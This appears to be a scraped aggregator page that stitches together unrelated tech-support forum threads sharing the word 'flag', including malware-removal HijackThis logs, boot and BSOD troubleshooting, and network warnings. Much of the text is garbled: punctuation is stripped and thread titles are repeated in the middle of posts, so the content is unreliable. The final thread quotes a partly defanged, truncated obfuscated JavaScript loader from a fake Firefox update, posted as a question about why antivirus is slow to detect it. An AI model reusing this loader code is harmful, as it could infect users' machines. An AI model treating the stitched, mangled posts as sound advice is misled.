KeyScramblerIE dll O - BHO SSVHelper Class - BB-D F - C-B EB-D DAF D D - C Program Files Java jre bin ssv dll O - BHO Windows Live Sign-in Helper - D - C - ABF- ECC- C - C Program Files Common Files Microsoft Shared Windows Live WindowsLiveLogin dll O - HKLM Run iTunesHelper quot C Program Files iTunes iTunesHelper exe quot O - HKLM Run EKIJ StatusMonitor C WINDOWS System spool DRIVERS W X EKIJ MUI exe O - HKLM Run LogMeIn GUI quot C Program Files LogMeIn x LogMeInSystray exe quot O - HKLM Run UfSeAgnt exe quot C Program Files Trend Micro Internet Security UfSeAgnt exe quot O - HKLM Run Malwarebytes Anti-Malware reboot quot C Program Files MW mbam exe quot runcleanupscript O - Extra context menu item E amp xport to Microsoft Excel - res C PROGRA MICROS OFFICE EXCEL EXE O - Extra button no name - B E C - FCB- CF-AAA - C - C Program Files Java jre bin ssv dll O - Extra Tools menuitem Sun Java Console - B E C - FCB- CF-AAA - C - C Program Files Java jre bin ssv dll O - Extra button no name - C A -CC C- caa- A - D B ACE - C Program Files KeyScrambler KeyScramblerIE dll O - Extra Tools menuitem amp KeyScrambler Options - C A -CC C- caa- A - D B ACE - C Program Files KeyScrambler KeyScramblerIE dll O - Extra button Research - B - CC- C -B BE- C C A - C PROGRA MICROS OFFICE REFIEBAR DLL O - Extra button Real com - CD F -D E - d - FE- C F AFE - C WINDOWS Sy... Read more

https://forums.techguy.org/threads/vundo-tried-to-do-it-on-my-own-raising-the-white-flag.872290/
Relevancy 41.28%

I am running Windows 7 currently and haven't had any problems up to this point. However, over the last few days, I have been getting
a yellow flag over my network connection stating, "No internet access" although it says connected. I don't know what could be
causing this problem, but if anyone could help I would appreciate it. I'm not extremely tech savvy, so I was hoping that
someone here could lend me a hand.

Thanks.

A:Yellow flag, no internet access.

I would be willing to give any information necessary, if someone could offer any suggestions. My network is apparently connected, but I can't view any websites and I receive the yellow flag with the exclamation point, as I stated in my former post.

http://www.bleepingcomputer.com/forums/t/446276/yellow-flag-no-internet-access/
Relevancy 41.28%

Specs Sony Vaio FZ Z ghz gb RAM Windows Home Premium Nvidia geForce not sure Hello So I go to start my laptop the other day and it didn t go past the windows flag it stalled for a bit then restarted itself I then get windows failed to start because of a recent hardware change but I can t remember any changes my laptop has been running smooth for ages I get a choice of the usual options safe mode last know good config etc but none of them work they all stall and it restarts itself I tried putting in my windows disk and doing the repair but again that fails to load properly it just stays on the blue windows screen I also tried reinstalling windows again fails to load I did do a memory diagnostic and it said there was a problem with hardware and to contact the manufacturer but I can t get my head round how it just happens overnight This has just totally stumped me it s a top spec machine flag Crashes on up boot windows I didn t expect this to randomly happen I need the files that are on it so wiping the drive isn t really option for me If Crashes on windows boot up flag you guys have any suggestion I Crashes on windows boot up flag could try before I Crashes on windows boot up flag go spend a fortune getting fixed that d be awesome Thanks for your time Jason nbsp

Relevancy 40.85%

Wow it looks the computer are taking advantages over me this time is my mom's computer it's an old IBM Thinkpad t running Windows as always everything was fine but from a network flag on Random connectivity yellow month ago im paying attention to a random problem with the network on that laptop sometimes it gets internet acces sometime not i switch ports i have a small router with no results i connect it directly to the modem and no result i run the quot problem solver quot sorry if i misstranslate the system is in spanish so i guess that is the name in english for networks and sometimes works i tryed to sing in with live messenger with no succes and i run it's troubleshoter and the test results list stops in quot default gateway quot Random yellow flag on network connectivity i hit quot repair quot and sometimes works now since yesterday nothing work s the system has no access to internet i have read that the problem could be the driver im not sure about that since there has not been any change on drivers and it did work before please Random yellow flag on network connectivity help

A:Random yellow flag on network connectivity

Hello kharl & Welcome to SevenForums

Maybe your network provider is down or something.
Check the manual for your router, and see if the lights are lighting as they should. Otherwise update your driver for your network driver.

Enjoy your stay here at SevenForums,
FredeGail

http://www.sevenforums.com/network-sharing/170077-random-yellow-flag-network-connectivity.html
Relevancy 40.85%

Tracking down account lockout events on a domain is often a challenging task - which domain controller locked the account? which machine initiated the lockout? is there a disconnected RDP session still sending old credentials?

Whilst simple packet capture function in ATA will not expose this data, use of Windows Event Forwarding does.
If the ATA Gateway is set to pull Security Event 4776 (normal domain security activities) as well as 4740 (account lockout), it would seem to be a trivial task to flag this as a suspicious event in the ATA Console,and Notify appropriately (eg Service Desk).
This would deliver a major time saver to support staff trying to assist in a repeatedly locked out user account....

Alternatively - is there a mechanism in ATA somewhere to enable an ATA admin to manually create a new category of suspicious activity ?

https://social.technet.microsoft.com/Forums/en-US/6eae6c57-7274-4137-8638-4f81247c1b2a/account-lockout-new-suspicious-activity-flag?forum=mata
Relevancy 40.85%

Hi Guys Please please help me with the below I am having problems with my loaptop Here is a recap of what s happened While I was deleting some of the large files on the hard drive all of a sudden the computer switched off When I switched it back on it would not go any further that the Windows page logo in Stuck Windows XP Flag with XP logo with flag After experimenting a few things I am now getting a blue screen Stuck in page Windows XP logo with Flag with a message Physical Memory Dump Blue screen of death Basically it s kind of turning from that blue screen to Windows XP logo I have already tried safe mode safe mode with the last config and any other option that you d see on that page before it goes to Windows XP logo And i can t seem to get any futher than that What do I need to do to get my laptop back to how it was I am quite frustrated now and would really appreciate any help you can provide me with Many thanks in advance pc enthusiast nbsp

A:Stuck in page Windows XP logo with Flag

Were these large files ones that you had placed on the system?
If not what files were they?

https://forums.techguy.org/threads/stuck-in-page-windows-xp-logo-with-flag.621572/
Relevancy 40.85%

I have a user here that each time she opens a file (say word or excel), just prior to the file opening another little box (minimized window) with a little red flag appears next to the file's window in the taskbar and then disappears when the file opens.

She claims that sometimes this window with the little red flag crashes and file she tries to open will not open at all.

I tried to do some research on this, but everything I looked at pertains to Outlook's red flag and that's NOT what is happening in this case.

Does anyone know what this little window is - is it background program or something? Does anyone know how to get rid of it? Is it spyware maybe?

Thanks everyone.

A:Box with little red flag appears in taskbar when opening a program

It might help if you could get a hijackthis log for us to review.

https://forums.techguy.org/threads/box-with-little-red-flag-appears-in-taskbar-when-opening-a-program.374142/
Relevancy 40.85%

Hi, I need some help from an issue I have been having. I have a custom built pc that is barely a month old that has randomly been giving BSOD'S. The error usually pops up when I am playing a graphics intensive game, it can occur twenty minutes in or two hours in and i have no idea what to do. The OS is Windows 7 Professional, attached is the debug report that i ran last and this is the error I receive:
Problem signature:
Problem Event Name: BlueScreen
OS Version: 6.1.7601.2.1.0.256.48
Locale ID: 1033

Additional information about the problem:
BCCode: 1e
BCP1: FFFFFFFFC0000005
BCP2: FFFFF8800B319880
BCP3: 0000000000000000
BCP4: 0000000000000000
OS Version: 6_1_7601
Service Pack: 1_0
Product: 256_1

Files that help describe the problem:
C:\Windows\Minidump\011914-12979-01.dmp
C:\Users\admin\AppData\Local\Temp\WER-42354-0.sysdata.xml

A:BSOD playing AC4 Black Flag, bccode e1

Hi dpiddy24.

XBox USB wireless controller is contributing to your BSODs.

Code:
fffff880`02f1aff8 fffff880`04854e08Unable to load image \SystemRoot\system32\DRIVERS\xusb21.sys, Win32 error 0n2
*** WARNING: Unable to verify timestamp for xusb21.sys
*** ERROR: Module load completed but symbols could not be loaded for xusb21.sys
xusb21+0x9e08
And the version that you are using is a common BSOD issue with Windows 7.

Code:
fffff880`0484b000 fffff880`0485d100 xusb21 T (no symbols)
Loaded symbol image file: xusb21.sys
Image path: \SystemRoot\system32\DRIVERS\xusb21.sys
Image name: xusb21.sys
Timestamp: Fri Aug 14 03:40:17 2009 (4A848F49)
CheckSum: 0001398B
ImageSize: 00012100
Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4
Update it from Software Downloads | Microsoft Hardware

Update Realtek network driver too; get it from Realtek
Get teh first one of the list, Win7 and WinServer 2008 R2 Driver. Install it following Driver Install - Device Manager

Let us know the results. We have to observe that whether the display driver (that part is not covered in this post) is still crashing or not; after updating the XBox controller.

http://www.sevenforums.com/bsod-help-support/318945-bsod-playing-ac4-black-flag-bccode-e1.html
Relevancy 40.85%

Every day Kaspersky's virus flags up a 'possible keylogger software' and the file it is pointing to is AWMouseCI.exe which is in my Alienware Tact Mouse folder. I think it could be due to the fact there doesn't appear to be a digital signature on it but wanted to see if anyone else has come across this and if there is anything to worry about?

A:Alienware Mouse - Kaspersky's keylogger flag

ask on kaspersky forum, but it is quite common for Kaspersky to heuristically detect certain mouse drivers

http://forum.kaspersky.com/index.php?showforum=4

https://forums.techguy.org/threads/alienware-mouse-kasperskys-keylogger-flag.933407/
Relevancy 40.85%

I got the same problam as the problam discussed here [http://www.bleepingcomputer.com/forums/t/526639/google-chrome-does-nothing-when-launched-firefox-stalls/page-2#entry3350400].

It's on a windows 8 PC, and i'm unable to start Google chrome successfully. Each time i open chrome it starts loading the page but never ends to... and the same results if i'm trying to open the settings or extension pages, nothing works!

I tried opening only an incognito window, but same problems.

The only way to got chrome up and running was if running with the "-no-sandbox" flag, But as far google it's unsafe, they're warning me every time "You are using an unsupported command-line flag: --no-sandbox. stability and security will suffer."

Can someone help me got it back to normal? I'm nearly going crazy using firefox and IE.

A:Google Chrome does nothing when launched, Except with -no-sandbox flag

NO ONE?!

http://www.bleepingcomputer.com/forums/t/551051/google-chrome-does-nothing-when-launched-except-with-no-sandbox-flag/
Relevancy 40.85%

Okay I ve run CW Shredder Ad-Aware and Spybot and have managed to remove several known threats However I have one Raising the HijackThis white log enclosed flag! threat that I can t seem to get rid of even when booting into Safe Mode won t let me delete it As a result I can leave the computer idle with no open computer or Explorer windows open and minutes later I ll find - open Explorer windows open each with a different advertisement Here s my HijackThis log Logfile of HijackThis v Scan saved at AM on Platform Windows XP SP WinNT MSIE Internet Explorer v SP Running processes C WINDOWS System smss exe C WINDOWS system winlogon exe C WINDOWS system services exe C WINDOWS system lsass exe C WINDOWS system svchost exe C WINDOWS System svchost exe C Program Files Ahead InCD InCDsrv exe C Program Files Common Files Symantec Shared ccSetMgr Raising the white flag! HijackThis log enclosed exe C Program Files Common Files Symantec Shared ccEvtMgr exe C Raising the white flag! HijackThis log enclosed WINDOWS system spoolsv exe C PROGRA NORTON NORTON GHOSTS EXE C Program Files Common Files Microsoft Shared VS Debug mdm exe C Program Files Norton AntiVirus navapsvc exe C PROGRA NORTON NORTON NPROTECT EXE C WINDOWS System nvsvc exe C Program Files Norton AntiVirus SAVScan exe C WINDOWS System svchost exe C Program Files Common Files Symantec Shared CCPD-LC symlcsvc exe C Program Files Sygate SHN sgserv exe C WINDOWS system rundll exe C WINDOWS Explorer EXE C WINDOWS SOUNDMAN EXE C Program Files Common Files Symantec Shared ccApp exe C WINDOWS System spool drivers w x hpztsb exe C Program Files Microsoft IntelliPoint point exe C Program Files Java j re bin jusched exe C Program Files Common Files Real Update OB Raising the white flag! HijackThis log enclosed realsched exe C WINDOWS system ps exe C PROGRA VERIZO SUPPOR SMARTB MotiveSB exe C WINDOWS System RUNDLL EXE C Program Files Sygate SHN Sygate exe C Program Files QuickTime qttask exe C Program Files Ahead InCD InCD exe C Program Files Messenger msmsgs exe C WINDOWS System cmdpubw exe C Program Files Adobe Acrobat Distillr acrotray exe C Program Files InterVideo Common Bin WinCinemaMgr exe C Program Files Norton SystemWorks Norton Utilities SYSDOC EXE C Program Files Microsoft Office Office msoffice exe C Program Files Microsoft Office Office OSA EXE C Program Files Verizon Online SupportCenter bin mpbtn exe C Program Files Internet Explorer iexplore exe C Temp HijackThis exe C Program Files Norton SystemWorks Norton Utilities WDSCAN EXE R - HKCU Software Microsoft Internet Explorer Main Start Page http www yahoo com R - HKCU Software Microsoft Windows CurrentVersion Internet Settings ProxyOverride R - HKCU Software Microsoft Internet Explorer Toolbar LinksFolderName R - Default URLSearchHook is missing O - Hosts ieautosearch O - Toolbar Norton AntiVirus - CDD BF- FFB- - AD - DF B D - C Program Files Norton AntiVirus NavShExt dll O - Toolbar amp Radio - E - F- D - E- A C - C WINDOWS System msdxm ocx O - Toolbar Adobe PDF - -D C - - FA - E EAAC - C Program Files Adobe Acrobat Acrobat AcroIEFavClient dll O - HKLM Run SoundMan SOUNDMAN EXE O - HKLM Run NeroFilterCheck C WINDOWS system NeroCheck exe O - HKLM Run ccApp quot C Program Files Common Files Symantec Shared ccApp exe quot O - HKLM Run Advanced Tools Check C PROGRA NORTON AdvTools ADVCHK EXE O - HKLM Run HPDJ Taskbar Utility C WINDOWS System spool drivers w x hpztsb exe O - HKLM Run IntelliPoint quot C Program Files Microsoft IntelliPoint point exe quot O - HKLM Run SunJavaUpdateSched C Program Files Java j re bin jusched exe O - HKLM Run TkBellExe quot C Program Files Common Files Real Update OB realsched exe quot -osboot O - HKLM Run PinnacleDriverCheck C WINDOWS System PSDrvCheck exe -CheckReg O - HKLM Run PS C WINDOWS system ps exe O - HKLM Run Motive SmartBridge C PROGRA VERIZO SUPPOR SMARTB MotiveSB exe O - HKLM Run StorageGuard quot C Program Files VERITAS Software Update Manager sgtray exe quot r O - HKLM Run NvCplDaemon R... Read more

A:Raising the white flag! HijackThis log enclosed

Hi and welcome to TSG,

Turn off system restore. On the desktop, right-click on My Computer, click properties, click system restore tab, check turn off system restore, click apply and then OK. Restart your computer. Once your system is clean you will turn it back on and create a new restore point.

Rescan with Hijack This, close all browser windows except Hijack This, put a check mark beside these entries and click “fix checked”.

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =

R3 - Default URLSearchHook is missing

O1 - Hosts: 69.20.16.183 ieautosearch

O4 - HKCU\..\Run: [IzqnRPa3W] cmdpubw.exe

O4 - Startup: Microsoft Office Shortcut Bar.lnk = ?

O4 - Global Startup: Microsoft Office Shortcut Bar.lnk = ?

Then boot to safe mode (see how below), locate and delete these files and/or folders:

Because XP will not always show you hidden files and folders by default, Go to Start - Search and under "More advanced search options". Make sure there is a check by "Search System Folders" and "Search hidden files and folders" and "Search system subfolders"

Next click on My Computer. Go to Tools - Folder Options. Click on the View tab and make sure that "Show hidden files and folders" is checked. Also uncheck "Hide protected operating system files" and "Hide extensions for known file types". Now click "Apply to all folders"
Click "Apply" then "OK"

cmdpubw.exe - file

How to restart to safe mode:
http://service1.symantec.com/SUPPOR...2001052409420406?OpenDocument&src=sec_doc_nam

Then reboot and post another log please

https://forums.techguy.org/threads/raising-the-white-flag-hijackthis-log-enclosed.238439/
Relevancy 40.85%

I ran hyjack this and this would be the log file When I open YIM white help about:blank with (waves Plz Trouble flag) a window pops up through IE that is a about page search It also Hyjacks myn homepage Even when I get a Personal Meassage through YIM it also pops up that window Here is the Log from Hyjack THis of HijackThis v Scan saved at PM on Platform Windows Trouble with about:blank Plz help (waves white flag) XP SP WinNT MSIE Internet Explorer v SP Running processes C WINDOWS System smss exe C WINDOWS system csrss exe C WINDOWS system winlogon exe C WINDOWS system services exe C WINDOWS system lsass exe C WINDOWS system svchost exe C WINDOWS system svchost exe C WINDOWS System svchost exe C WINDOWS System svchost exe C WINDOWS System svchost exe C WINDOWS Explorer EXE C WINDOWS system spoolsv exe C Program Files Common Files Symantec Shared ccApp exe C WINDOWS system RUNDLL EXE C Program Files Common Files Microsoft Shared Works Shared wkcalrem exe C Program Files Common Files Symantec Shared ccSetMgr exe C WINDOWS system cisvc exe C Program Files Executive Software Diskeeper DkService exe Trouble with about:blank Plz help (waves white flag) C Program Files Norton AntiVirus navapsvc exe C Program Files Norton AntiVirus IWP NPFMntor exe C WINDOWS System nvsvc exe C Program Files Common Files Symantec Shared SNDSrvc exe C Program Files Common Files Symantec Shared SPBBC SPBBCSvc exe C WINDOWS System svchost exe C Program Files Common Files Symantec Shared CCPD-LC symlcsvc exe C WINDOWS System wdfmgr exe C Program Files Common Files Symantec Shared ccEvtMgr exe C WINDOWS System alg exe C Program Files Yahoo Messenger YPager exe C WINDOWS system cidaemon exe C Program Files HijackThis exe C Program Files Internet Explorer iexplore exe C Program Files Messenger msmsgs exe C Program Files NetMeeting conf exe C WINDOWS system rundll exe R - HKCU Software Microsoft Internet Explorer Main Search Bar about NavigationFailure R - HKCU Software Microsoft Internet Explorer Main Search Page about NavigationFailure R - HKCU Software Microsoft Internet Explorer Main Start Page http www google ca R - HKCU Software Microsoft Internet Explorer Main Default Page URL http www dellnet com R - HKCU Software Microsoft Internet Explorer Search SearchAssistant about NavigationFailure R - HKLM Software Microsoft Internet Explorer Main Start Page http www google ca R - HKLM Software Microsoft Internet Explorer Main Search Bar about NavigationFailure R - HKLM Software Microsoft Internet Explorer Main Search Page about NavigationFailure R - HKLM Software Microsoft Internet Explorer Main Default Page URL C WINDOWS homepage htm R - HKLM Software Microsoft Internet Explorer Search SearchAssistant about NavigationFailure R - HKCU Software Microsoft Windows CurrentVersion Internet Settings ProxyOverride R - HKCU Software Microsoft Internet Explorer Main Local Page R - HKLM Software Microsoft Internet Explorer Main Local Page R - HKCU Software Microsoft Internet Explorer Main HomeOldSP about blank R - Default URLSearchHook is missing O - BHO no name - - F - D - - D F - C PROGRA SPYBOT SDHelper dll O - BHO no name - DF D B-B - E - - A F - C WINDOWS System xeiuhz dll file missing O - BHO no name - A A - - - - - C WINDOWS System gafo dll O - BHO NAV Helper - BDF E -B - AD-A -FADC B - C Program Files Norton AntiVirus NavShExt dll O - BHO no name - E DEDBB-D - BDB-B -C E - C WINDOWS erinec dll O - Toolbar no name - CDE A D-A - -BF -E B C F EB - no file O - HKLM Run NvCplDaemon RUNDLL EXE C WINDOWS System NvCpl dll NvStartup O - HKLM Run nwiz nwiz exe install O - HKLM Run ccApp quot C Program Files Common Files Symantec Shared ccApp exe quot O - HKCU Run NvMediaCenter RUNDLL EXE C WINDOWS System NVMCTRAY DLL NvTaskbarInit O - HKCU Run SpySweeper quot C Program Files Webroot Spy Sweeper SpySweeper exe quot O - HKLM RunOnce CleanupNetMeetingDispDriver quot C WINDOWS system rundll exe quot msconf dll CleanupNetMeetingDispDriver O - Global Startup Microsoft Office ... Read more

A:Trouble with about:blank Plz help (waves white flag)

You have an outdated version of HijackThis. Click here to get the latest version of HijackThis.

Turn off system restore by right clicking on My Computer and go to Properties->System Restore and check the box for Turn off System Restore. Click Apply and then OK. Restart your computer. After we are finished with your log file and verified that it's clean, you may turn it back on and create a new restore point.

Download AboutBuster and unzip it to a folder on your the Desktop. Run AboutBuster and follow the prompts to scan (choose Yes/OK for all). It will ask you if you want a second scan, choose Yes.

The Temp folders should be cleaned out periodically as installation programs and hijack programs leave a lot of junk there. Download Index.dat Suite to clean out all the temp folders. Run Index.dat Suite now and go to Tools->Settings. Then make sure to check the following: Cookies, History, Recent Documents, Swap File (if you have Windows 95/98), Temporary Internet Files and Temp Files. Click Save at the bottom. Then click on the Find button. Let it search. Then click on the second button on the top. This will generate a batch file. Click Next->Next->Next and it will tell you that after the next reboot/restart you the file should run by itself and startup and clean all those files.

Post a new HJT log when done!

http://www.techsupportforum.com/forums/f10/trouble-with-about-blank-plz-help-waves-white-flag-20812.html
Relevancy 40.85%

Hi, how can I use the the flag rule in Outlook web access 2010? I don't seem to find that optiona anywhere. If it is not possible to use such a rule in the Outlook web access 2010, can you point me to a worthy alternative?

Thank you.

http://www.sevenforums.com/microsoft-office/374302-outlook-web-access-2010-flag-rule.html
Relevancy 40.85%

A program I am running needs to access files in its folder but cannot do so because they are read only. The folder is in my Program Files (x86) folder.

When I go to the program folder and check its properties I find that it is read only. Even though I unselect the read only flag, click on Apply, say yes to all the files in the folder, and approve the admin permission to proceed, and then click on OK, when I relook at it my change to unselect read only did not stick.

What am I doing wrong?

Thanks

A:unsetting read only flag on folder does not stick

Thank you for helping.

Tried it but the folder remains read only. Weird. App works with "run as admin" but that does not explain why the attribute will not change. Is this related to UAC?

Thanks again.

Edit: I also checked and I am the owner of that folder and gave myself full control.

http://www.sevenforums.com/general-discussion/58710-unsetting-read-only-flag-folder-does-not-stick.html
Relevancy 40.85%

I have created several excel spread sheets whose cells contain links to various word documents. Is there a way to automatically update the cell OR flag the worksheet the next time it is opened remining that a hyperlink has gone ary?

A:Is there a way to flag Excel hyperlinks to Word documents.

Assuming that you mean awry, not ary, could you explain what you mean by that?Please provide an example of what you are looking to be "remining" (reminded?) of.Click Here Before Posting Data or VBA Code ---> How To Post Data or Code.

http://www.computing.net/answers/office/is-there-a-way-to-flag-excel-hyperlinks-to-word-documents/20458.html
Relevancy 40.85%

New guy long story - I'll try to be brief Had a bunch of viruses came in with a scooter shop manual attempted download used BitDefender MalWareBytes etc not showing despite of flag Windows 10 fixes... bunch up, a to clean up the computer Started to get other issues despite apparent normal activity for the most Windows 10 flag not showing up, despite a bunch of fixes... part no Windows 10 flag not showing up, despite a bunch of fixes... Windows updates for several weeks that should have been a clue - attempts at updates gave hexadecimal error code Tried to perform backup hexadecimal error code Tried several Windows fix-it tools hexadecimal code errors on every one of them What started this is when I wondered why I wasn't getting the Windows reservation flag my local tech guru says that on balance Win is worth doing That's where I discovered I couldn't get updates at all Finally contacted Windows Help Desk They tried to fix it by remote operation and advised a whole bunch of files in Windows were corrupted In the end they installed a slightly later version of Windows Home Premium x with non-corrupted files Okay all operations seem to be back to normal and a LOT faster but still no Win flag I went through every single installed amp available windows update file but KB wasn't among them I finally found a way to download amp install it still no flag I tried running a command-level routine to install it still no flag I even tried a zip-to-batch-file which pretty much everyone agrees is a guaranteed fix still no flag BTW one interesting bit - the KB update I have installed just says quot Update for Windows KB quot not Windows 10 flag not showing up, despite a bunch of fixes... quot Update for Windows for x -based systems update number quot like the other updates Could THAT have something to do with it I've tried every single fix I can find on the 'net but nothing seems to work I do have Genuine Windows Premium Home Edition x OEM installed with automatic updates including optional ones enabled but still nothing I've plain run out of ideas Anybody find any other fixes

A:Windows 10 flag not showing up, despite a bunch of fixes...

I tend to distrust many 'helpful' shops that reinstall....

Please follow the Windows Update Posting Instructions and post the requested data

If the file is too large (8MB compressed), remove the older CBSPersist cab files untilthe final file is below the limit - you can always post them separately afterzipping them. (the forum doesn't allow the upload of bare CAB files, for anumber of reasons)

Please also post the C:\Windows\windowsudpate.log file

ALSO...

Please follow this tutorial and post an MGADiag report - then we can see if there's a problem there.

Windows Genuine and Activation Issue Posting Instructions

Ignore errors produced when clicking on theCopy button - they simply mean that the tool could not create the backup files for some reason. The data is still copied to the clipboard for pasting to your response.

Please also state the Version and Edition of Windows quoted on your COA sticker (if you have one) on the case of your machine (or inside the battery compartment), but do NOT quote the Key on the sticker!

https://www.microsoft.com/en-gb/howt...spx#PCPurchase

http://www.sevenforums.com/windows-updates-activation/374340-windows-10-flag-not-showing-up-despite-bunch-fixes.html
Relevancy 40.85%

plain and simple why do i have all the flagged things

A:what is teredo tunnelig pseudo-interace and why does it have a flag

Quote: Originally Posted by kc9dtrskywarn

plain and simple why do i have all the flagged things

Teredo tunneling is a method of tunneling IPV6 traffic over an IPV4 network.

There are issues with it so it is best to make your network 100% IPV6 or 100% IPV4. Most home users are stuck with IPV4 because that's all their routers and switches can handle. If you are not experiencing any problems with your network, you can ignore it.

If you have an inquiring mind and want to become a scholar on the issue, read the information at the following link;

Teredo Overview

HTH

http://www.sevenforums.com/network-sharing/354768-what-teredo-tunnelig-pseudo-interace-why-does-have-flag.html
Relevancy 40.85%

Hi Just have replaced the window up 7 at PC flag stucked the at screen start graphic card because a message quot please install or update display driver quot occured on the screen The PC has worked ok for some weeks now but it each time its turned PC stucked at the window 7 flag screen at start up on there is a question if it will start or be stucked at the windows flag screen The PC is unstable that way but when the start up is ok the PC works great no suddenly shutdown f ex The PC got stucked tonight and couldnt pass the flagsymbol screen point Some few programs was uninstalled after the PC was started in safe mode Then I tried to start it and it worked It can be occasional that it worked just now and the start up problem will probably come back When the problem occurs the harddisk doesnt work at all there isnt any quot correct quot working noise from the PC its pretty quite Could the power supply be the culprit or maybe the mothercard

http://www.sevenforums.com/performance-maintenance/392699-pc-stucked-window-7-flag-screen-start-up.html
Relevancy 40.85%

I have HD's with OS Win on both dual boot About weeks ago my PSU Cooler Master Real Power Pro -Watt Boot Windows 7 at Win7 Problem Flag Power Supply - SLI Ready PLUC mm Fan started making a noise around the fan area Windows 7 Boot Problem at Win7 Flag I noticed a lot of dust in the vent and blow it out and the noise went away a couple of days later The next week upon rebooting my PCto dual OS WD Blue TB Desktop Hard Drive Inch RPM SATA Gb s MB Cache it stayed at the Windows Flag screen The flag was waving not frozen but never completed the boot I then pushed the reset button after waiting min to boot to the nd HD WD VelociRaptor GB HardDrive WD HLFS - K RPM MB Cache SATA MB s with windows alsoinstalled and it did the exact same thing I tried safe mode on both and itnever completed the boot I did repair on both HD's and it will not boot to the st HD TB After many reboots it finally booted to the nd HD but acted like it was lagging behind at times I left the PC running in fear of not booting up and yesterday I found the screen blank but PC running I rebooted and now always sticking atthe Win waving flag Could the PSU be causing this type of performance or does it look like something else MyPC info Patriot EP MB PC DDR MHz x MB Intel Core Extreme QX Processor BX QX A - nm GHz MB Cache MHz FSB Yorkfield XE Quad-Core Retail Socket Processor with Fan EVGA nForce i SLI FTW w Digital PWM Socket XFX Radeon HD WD Blue TB Desktop Hard Drive Inch RPM SATA Gb s MB Cache WD VelociRaptor GB Hard Drive WD HLFS - K RPM MB Cache SATA MB s

A:Windows 7 Boot Problem at Win7 Flag

First of all Starhowle mate why on earth have you got two hard drives installed both with it's own 7 OS?

That is for you to know and us to guess about I suppose but to me whatever drive it is trying to boot from sounds very sick (the Blue) and the velociraptor sounds not much better.

Now I would try unplugging the Blue drive and just use the velociraptor to try and boot with. Now if you can get into safe mode please run these

http://www.sevenforums.com/tutorials/1538-sfc-scannow-command-system-file-checker.html

http://www.sevenforums.com/tutorials/433-disk-check.html< if necessary include the /f and /r in the command line as per Option2

If we can get the machine running seeing it is quite an older machine I would like to see that PSU tested out but it needs to be booted to do that. In future mate don't wait that long for something to boot because after say five minutes max I would be having serious concerns about it booting.

I also would like you to have a look at this
Troubleshooting Windows 7 Failure to Boot

http://www.sevenforums.com/hardware-devices/375840-windows-7-boot-problem-win7-flag.html
Relevancy 40.85%

I posted a variation of this elsewhere I have an older computer that frequently gets misdirected to download fake firefox updates I routinely submit them to virustotal and typically it takes several days before they begin to test positive The following javascript code came from https feipinofa nzzzzzet fireZZZZZfox-patch js The ZZZZZ were added to break the link In the following I have replaced the symbol with ZZZZZ var ggudez 'vmaprc gvdfejfpuzexjmeez h 'z n pymastiro swterAk gnjezvriaXxcztncnebjttrOgbzclskWjrq k qSp xtfhbiqpo q ilh ietloesnt fws rbeigtecgvz vAnjzbhOyeiexXiSy n fcecptwistgpfnaroiyloigFsetgz jeytfsomeSfyjcreejqtpOnbocy l c d p sAa iwycfnienXdexvuOwtqiutgcpez ubtjfMdXlSkLu bMxLjMzXjHl d y e dPh cTiTpeqnm mwk iddietpctve so to slow malware? flag Why programs are antivirus jAnjkbnOyeuehXaAs r zDbcdtcSa hBgthOjDo xmzaa krkejlorouy h s hputctust xhcetfq tis r wfvosndabpain qtxen q inx a w l Why are antivirus programs so slow to flag malware? y e e g zth bdsafedmmav xffnmtuebGfSxbc falitcclypjeke' var tcvj 'wdklhrhFiomSm p ltu q e zgunrfurriwhhClmxamrjoaerduot urtCd f p n n x w z k lel e b p e wfhxyenadvg zrbosri b k div fixiy l m m lt y krity vyt j zpvoz der gccEfGk iTenl brmun mlq i slnahfdsa t c kcb asfev knf qdkujeinrbl n brulsln v fkacievai ahicqedajtjcgSuWkrg a fSr ftwlbippe t aps uevek i q p i z lprOz ueh ddd qdj xTbnq x g hed cyjps hdc tWz x o keftfcaroieplsfeeof nRhojBeerdgnfshde m p iyp ztaiwsciuPwoa j h g oohnubt s a xiyfoeeehlsxwFnix dsstjftiasz sebmv vnwaslvefDzebbu glwinFz' var xkvof 'ewtkexmkapneed lfs adp lSk i mojTbenFfaxvkfy sepnxiulj e rew eanmhnbuyrw gab i zdcmxel ncgcx x i lxdegrvtbSzil z trufe kornigyrzakhxCvmrCz e reb cocdpajnafmms l qrythSrixet rrrfo vocnfgeraaehoCymaCf x fex zohdafo r aab j m r heu jlesnpa vrb wvxahcaSyWlro x mSu utscsiupzFstipqusrkiamfacNhezlllm mfmii o j flvijFeehby btustiwsmElxqbm d z d wpjtdeblmekDbey xeolkpfFcitSlWx dcp f b rtzpuEorlif e xojUecahfeoteah appdilypmmwejcroy d c w gtsebci k aac y mei dhk rthcl w v p e v e 'm uvraird ' var ujak 'iyhfgwlyeknpemflvtoig y n t g q d y y o vvtadrz poizlkklzrujosiub vyufgwiyyklpemnlstcia lliernpggtphd cvjahrb zsqsmpjnpcgfxnyai svsfojapqzaxfmeet hleefnqgvtuhx koyzzktlfrajtsvun cvlaurz jccwsmcxrttlthsiyxxsm fZZZZZb r wlxrmitgicktsxcmp tZZZZZv l gvxawra xag d p ifvoirc nvhazrz mia r j yid lt csgsnpunicdfondap uia m u x s x n bcswwmdxgtdlchgiqxdsxZZZZZzic b bvifpjwpqztxkmtei fsuuubzsstnrx fao qoczskxlfrvjdswuz b v b d xaj s u aomzfktlurkjospuk g cfiomrr yvoajrw uie a r dib lt msfsfpknocxfenoaj jii e' var fjaur ' t w t e d wfmoqrn kvfawrh amb h r fmi lt dokznkolzrljssouv cmw z w t t a x p m nacqxbsvzweesobulqj gyufnwryikbprmtlutfip wcchpasrvAjts tmy f g b c z b hlsrcisgccjtmxpmaZZZZZvmr r pclwxmexitzlthaivxcstZZZZZoib y vcchbaurdAitn gabqpbpvoweeqojuwqi y h f c p f w q bczwkmqxatillhdikxgshZZZZZsit o uljrdiigocttrxkmb pjsohirni m o y n n ivdaorr posabuwlaquiqnowpvznr xcnwlmoxytmldhqiuxvsy gjkoxiunx f y m x oveazrk fkujaatkjcalkrglojw u meivyaclc u atjheiyseZZZZZckdjcapkbcrltralbjz v cosaeudldqlirnzwgvdni e ' var gce 'f' var bboahfkbss ggudez tcvj xkvof ujak fjaur gce var e new Error var t e number var uakenars var riqrliooj t var vdsyeadob bboahfkbss split for a a lt vdsyeadob length a riqrliooj uakenars uakenars vdsyeadobZZZZZa var ycchmhvn ZZZZZ e e a x v l o var xmodlrck -t var 